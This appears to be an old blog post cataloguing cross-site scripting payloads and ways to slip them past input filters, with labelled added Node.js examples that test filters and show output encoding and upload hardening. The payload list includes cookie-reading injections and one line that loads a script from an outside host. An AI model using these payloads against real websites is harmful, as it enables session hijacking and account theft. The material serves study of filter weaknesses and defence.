http://skamason.com/7b9R


Saturday, 23 February 2013

XSS Bypassing

    XSS Locators:
           
    XSS<-->/\'="
     
    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
     
    '';!--"<XSS>=&{()}
     
     
     
    The old basic:
     
    "><script >alert(document.cookie)</script>
     
    Bypass filter when it strips <script> tags:
     
    %253cscript%253ealert(document.cookie)%253c/script%253e
    (double URL-encoding: %25 is "%", so a filter that runs after a single decode never sees "<"; a later decode produces the tag)
     
    "><s"%2b"cript>alert(document.cookie)</script>
    (%2b is "+": the tag name is split across a string concatenation, for input that is evaluated as code rather than copied verbatim)
     
    "><ScRiPt>alert(document.cookie)</script>
    (mixed case against a case-sensitive match)
     
    "><<script>alert(document.cookie);//<</script>
    (extra angle brackets against filters that pair up "<" and ">" before comparing the tag name)
     
    foo%00<script>alert(document.cookie)</script>
    (a NUL byte: C-style string handling in the filter stops at %00, while the browser keeps parsing)
     
    <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
    (nested tags: a single-pass removal of <script> and </script> reassembles the real tag from what is left)
     
    %22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
    (closes the attribute and tag with "/>, then builds the script tag at runtime from pieces so the literal string never appears in the request)
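As an added example (not code from the original post): a blacklist filter of the kind the bypasses above defeat, next to a hardened version of it and next to HTML entity encoding, which is what actually prevents injection into HTML text and quoted-attribute context. The payload strings are the ones listed above, constructed here as test input; the function names and the crude "still dangerous" oracle are my own. Node.js.

```javascript
// Added example, not from the original post. Runs under Node.js with no dependencies.

// 1. Naive filter: exact, case-sensitive, single-pass removal of <script> tags.
//    "<script >" (trailing space), "<ScRiPt>" and nested tags all get past it.
function naiveStripScript(input) {
  return input.replace(/<script>/g, "").replace(/<\/script>/g, "");
}

// 2. Hardened blacklist: case-insensitive, tolerates attributes/whitespace, and
//    repeats until nothing changes so "<scr<script>ipt>" cannot reassemble.
//    Still a blacklist: anything that is not a script tag passes untouched.
function stripScriptUntilStable(input) {
  let prev, cur = input;
  do {
    prev = cur;
    cur = cur.replace(/<\/?script[^>]*>/gi, "");
  } while (cur !== prev);
  return cur;
}

// 3. What to do instead for HTML text and quoted-attribute context: encode the
//    characters that change the parser state. No tag can start and no attribute
//    can close, whatever the input looks like.
function htmlEncode(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return input.replace(/[&<>"'\/]/g, (c) => map[c]);
}

// 4. Double URL-encoding. A filter that runs after the first decode sees "%3c",
//    not "<"; if anything downstream decodes again, the tag appears after the
//    filter has already run. Each layer must decode exactly once.
function filterAfterOneDecode(raw) {
  const once = decodeURIComponent(raw);           // "%3cscript%3e..." - no "<" yet
  const filtered = stripScriptUntilStable(once);   // nothing to strip
  return decodeURIComponent(filtered);             // "<script>..." reaches the page
}

// Crude oracle for "can this value still inject markup": a tag start or an
// unescaped double quote (attribute break-out) survived the filter.
function stillDangerous(filteredValue) {
  return /<[a-z\/]/i.test(filteredValue) || filteredValue.includes('"');
}

// Constructed from the payload list above.
const PAYLOADS = {
  basic:     '"><script >alert(document.cookie)</script>',           // space before ">"
  mixedCase: '"><ScRiPt>alert(document.cookie)</script>',
  nested:    '<scr<script>ipt>alert(document.cookie)</scr</script>ipt>',
  noScript:  '<img src=asdf onerror=alert(document.cookie)>',
};

// Run every filter over every payload. Returns { filterName: { payloadName: bool } }
// where true means the payload survived in a usable form. Note that the hardened
// blacklist still reports true for "basic" and "mixedCase": the '"' that closes
// the attribute survives, only the tag was removed.
function audit() {
  const filters = { naiveStripScript, stripScriptUntilStable, htmlEncode };
  const report = {};
  for (const [fname, fn] of Object.entries(filters)) {
    report[fname] = {};
    for (const [pname, payload] of Object.entries(PAYLOADS)) {
      report[fname][pname] = stillDangerous(fn(payload));
    }
  }
  return report;
}

console.log(JSON.stringify(audit(), null, 2));
```

The lesson the report makes visible: every improvement to the blacklist closes one payload and leaves the next one open, while encoding on output closes all of them at once because it never tries to recognise "bad" input.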
     
    When inside <script> tags:
     
    '; alert(document.cookie); var foo='
    (closes the string, runs the payload, then reopens a string so the rest of the original statement still parses)
     
    foo\'; alert(document.cookie);//';
    (against a filter that only backslash-escapes quotes: the payload's own backslash consumes the backslash the filter adds, so the quote still closes the string)
     
    </script><script >alert(document.cookie)</script>
    (no JavaScript escaping helps here: the HTML parser ends the script block at the first </script> regardless of JS quoting, then starts a new one)
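As an added example (not code from the original post): the three payloads above run against a quote-only escape and against a proper JavaScript string encoder. The "browser" is a small simulation written for this example: the HTML tokenizer ends a script block at the first `</script` it sees, whatever the JavaScript quoting state is, and each block is then executed with `alert()` and `document` stubbed out so the outcome can be observed without a real browser. Function names are my own; the payloads are constructed from the list above. Node.js.

```javascript
// Added example, not from the original post. Runs under Node.js with no dependencies.

// Naive: escape only the single quote. Beaten by a leading backslash
// (foo\'; ...) and by </script>.
function naiveQuoteEscape(value) {
  return value.replace(/'/g, "\\'");
}

// Correct for a JS string literal inside <script>: JSON encoding escapes
// backslash, double quote and control characters; on top of that, escape
// < > & so "</script" can never appear in the output, plus the two Unicode
// line terminators for older engines that treat them as newlines.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderNaive(value) {
  return "<script>var q = '" + naiveQuoteEscape(value) + "';</script>";
}
function renderSafe(value) {
  return "<script>var q = " + jsStringLiteral(value) + ";</script>";
}

// HTML tokenizer rule that matters here: script content runs to the first
// "</script", case-insensitively, regardless of JavaScript quotes.
function extractScriptBodies(html) {
  return [...html.matchAll(/<script[^>]*>([\s\S]*?)<\/script/gi)].map((m) => m[1]);
}

// Execute each script body with stubs. Returns whether any alert() was reached
// and the value of q from the last block that assigned it.
function runPage(html) {
  let fired = false;
  let q;
  const alertStub = () => { fired = true; };
  const documentStub = { cookie: "session=constructed-value" }; // constructed
  for (const body of extractScriptBodies(html)) {
    try {
      q = new Function("alert", "document", body + "\nreturn q;")(alertStub, documentStub);
    } catch (e) {
      // SyntaxError: the block was cut in half by the tokenizer.
      // ReferenceError: q never assigned in this block. A browser moves on; so do we.
    }
  }
  return { fired, q };
}

// Constructed from the payload list above.
const JS_PAYLOADS = [
  "'; alert(document.cookie); var foo='",
  "foo\\'; alert(document.cookie);//';",
  "</script><script >alert(document.cookie)</script>",
];

// For one payload: did the injection fire, and did the intended value survive?
function compare(payload) {
  return { naive: runPage(renderNaive(payload)), safe: runPage(renderSafe(payload)) };
}

for (const p of JS_PAYLOADS) console.log(JSON.stringify({ payload: p, result: compare(p) }));
```

The quote-only escape actually stops the first payload, which is why it looks adequate in a quick test; the second and third payloads show the two ways it fails. The encoder in `jsStringLiteral` returns every payload to the script as an inert string value.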
     
    Other XSS that don't require <script>:
     
    <img src=asdf onerror=alert(document.cookie)>
     
    <BODY ONLOAD=alert('XSS')>
     
    On IE, many tags accept a style attribute that can be abused (these rely on IE-specific CSS behaviour; CSS expression() in particular was removed from IE8 standards mode onward, so expect them to work only against old IE or pages rendered in compatibility mode):
     
    http://www.site.com?image=s%22%20style=x:expression(alert(document.cookie))
     
    http://www.site.com?image=s%22%20style=%22background:url(javascript:alert('XSS'))
     
    http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%27%29%29
     
    In older Firefox, if you control the content attribute of a refresh meta tag, you can inject a URL that uses the javascript: protocol (current browsers, Firefox included, refuse javascript: URLs in a meta refresh):
     
    http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
     
    XSS in JPEGs:
     
    Don't forget that if a user requests a JPEG file in IE directly (not through an embedded <img> tag), IE sniffs the contents and processes them as HTML if that is what the "JPEG" contains. This means we can upload a file with a .jpg extension containing an XSS payload. This works nicely when an application has functionality to upload images that are then viewed by others; it is common in webmail applications, where one can send an email containing an image attachment, etc. Many applications sanitize HTML attachments to block XSS attacks but overlook the way IE handles JPEG files. On the defending side this is closed by validating that uploads really are images, by sending X-Content-Type-Options: nosniff (honoured from IE8 onward) so the declared Content-Type is trusted, and by serving user-supplied files with Content-Disposition: attachment or from a separate origin.
     
    Example (the 39-byte body is the payload itself; note the image/jpeg Content-Type):
     
    HTTP/1.1 200 OK
    Date: Sun, 6 May 2007 11:32:35 GMT
    Server: Apache
    Content-Length: 39
    Content-Type: image/jpeg
     
    <script>alert(document.cookie)</script>
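As an added example (not code from the original post): two server-side controls for the upload case described above, written as plain functions that fit any Node.js handler. The byte strings are constructed here, one of them being the post's own 39-byte payload saved under a .jpg name; function names are my own.

```javascript
// Added example, not from the original post. Runs under Node.js with no dependencies.

// Sanity check that the stored bytes are a JPEG: SOI marker FF D8 FF at the
// start and EOI marker FF D9 at the end. This rejects the post's payload, but it
// is only a sanity check: EXIF and comment segments of a real JPEG can carry
// arbitrary bytes, so it does not prove the file is harmless.
function isJpeg(buf) {
  if (buf.length < 4) return false;
  const soi = buf[0] === 0xff && buf[1] === 0xd8 && buf[2] === 0xff;
  const eoi = buf[buf.length - 2] === 0xff && buf[buf.length - 1] === 0xd9;
  return soi && eoi;
}

// Response headers for serving a stored upload. X-Content-Type-Options: nosniff
// (IE8 and later, and every current browser) tells the browser to trust the
// declared Content-Type instead of sniffing the body; anything that fails
// validation is served as a download rather than rendered inline.
function uploadResponseHeaders(buf, declaredType) {
  const headers = {
    "X-Content-Type-Options": "nosniff",
    "Content-Length": String(buf.length),
  };
  if (declaredType === "image/jpeg" && isJpeg(buf)) {
    headers["Content-Type"] = "image/jpeg";
    headers["Content-Disposition"] = "inline";
  } else {
    headers["Content-Type"] = "application/octet-stream";
    headers["Content-Disposition"] = "attachment";
  }
  return headers;
}

// Constructed inputs: the post's payload with a .jpg name, and a byte string
// carrying the JPEG SOI, JFIF APP0 and EOI markers (not a decodable image,
// just enough to pass the marker check).
const SCRIPT_AS_JPEG = Buffer.from("<script>alert(document.cookie)</script>", "latin1");
const MARKER_ONLY_JPEG = Buffer.from([
  0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01,
  0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0xff, 0xd9,
]);

console.log("payload.jpg  ->", uploadResponseHeaders(SCRIPT_AS_JPEG, "image/jpeg"));
console.log("markers.jpg  ->", uploadResponseHeaders(MARKER_ONLY_JPEG, "image/jpeg"));
```

The marker check is the cheap first line; the header policy is what closes the hole in the browser even when a polyglot file gets past validation. Serving user uploads from a dedicated origin that holds no session cookies is the control that makes a missed case harmless rather than a cookie theft.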
